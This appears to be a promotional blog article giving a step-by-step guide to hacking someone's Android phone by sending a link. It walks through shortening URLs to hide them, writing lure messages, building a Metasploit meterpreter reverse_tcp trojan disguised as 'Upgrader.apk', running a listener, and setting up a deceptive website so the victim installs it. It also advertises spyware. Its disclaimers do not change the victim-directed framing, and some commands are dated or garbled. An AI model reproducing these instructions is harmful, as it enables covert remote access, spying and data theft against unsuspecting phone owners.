HomeInternetHacking an Android Phone By Sending A Link

Hacking an Android Phone By Sending A Link

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It is needless to say that smartphones have become an essential part of our lives. From communication to entertainment to shopping, we need our smartphones for every little thing we do.

We also use our smartphones to store sensitive and private data like card details, passwords, etc. This makes smartphones the prime targets of hackers.

A hacker can use different ways to get to your phone. One of the ways is by sending a link. If you are an Android user, you should be careful of what links you receive on your phone. That’s because this method is more commonly used for hacking Android mobile devices. The best way to hack the Android device is to use Eyezy.

In this post, we will tell you how to hack an Android phone by sending a link. But this is only for knowledge purposes. You shouldn’t use this method to hack someone’s phone.

What is Phone Hacking?

Phone hacking is the process used by hackers to gain unauthorized access to someone’s mobile phone. They hack smartphones to steal sensitive and private data. It also includes spying, intercepting calls, recording keystrokes, emails, messages, and transferring sensitive data to the hacker’s phone.

There are different methods of phone hacking that are used by hackers. Some of the most common methods you should be aware of are:

  • Spyware
  • Malware
  • Phishing
  • Wi-Fi hacking
  • Sending link
  • Through app

The number of phone-hacking cases has increased lately. You need to be very careful of the apps you download, and the links you visit on your phone. Also, you should avoid using public Wi-Fi as it is not safe.

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How to Hack an Android Smartphone by Sending a Link?

To hack an android phone by sending a link you need to first take the following steps:

  • The first step is to create a link using the right software. This link will take your victim to your app or website.
  • The next step is to send the link to your victim through a text message. You must shorten the URL to prevent the victim from seeing the actual link.
  • Write the message such that it lures the victim to click on the link immediately.
  • Once the victim clicks on the link, you can get access to his phone and get all the information you need.

However, this process isn’t that easy as it sounds. You need the right software to create a link. The best solution is to use Metasploit Software.

Hacking an Android Phone by Sending A Link Kali Linux

In this section, we will discuss how you can hack an Android phone by sending a link to Kali Linux. But before you start you need to download Kali Linux on your PC.

1. Get started with Kali Linux

  • After you download Kali Linux on your computer, open the software and create a Trojan.apk file.
  • To create the file, you need to type “msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk” on the terminal.
  • Once that is done, replace the LHOST IP address with your PC’s IP address.
  • Now type “msfconsole” on the terminal to open the Metasploit Console.

2. Build A Listener

  • Once Metasploit Console gets loaded, type “use exploit/multi/handler” for multi-handle exploit.
  • Then type “set payload android/meterpreter/reverse_tcp”
  • Now type “set LHOST YIPA”, and replace YIPA with your IP address.

3. Begin Exploiting

  • In this step, you need to start the listener that you created by typing “exploit”.
  • Now move the application “Upgrader.apk” to your Android phone.
  • The next thing you need to do is send the app to your victim and wait for him/her to install it on their device.
  • Once he/she installs the app, the meterpreter prompt will get started. This will help you get all the information you want from your victim’s phone.

Alternatively, you can also send a link that will lead your victim to your website. Make sure that the website has graphics and texts so that your victim doesn’t suspect anything.

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You should make the website such that it convinces the victim to install the apk file. You should use plain HTML to create the website.

One of the best websites to hack Android phones or games is Android4fun. You will find a lot of tricks and mods for your favorite games.

Hacking someone’s phone and stealing information is not legal. You need to be more protective about your device and keep it away from the hands of hackers. Once they get access to your phone, they can steal all your information and data you have stored in there.

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Manoar Molla
Manoar Molla
Manoar Molla is naturally passionate to write articles on different niche related to business, health, travel and digital marketing. He writes article by day and read at night and he has a passion to promote business by providing digital marketing articles which can increase organic traffic and Search Engine Visibility. He has published many articles on different blogs like contentpond and seonewbiehub. You may contact with me at [email protected]

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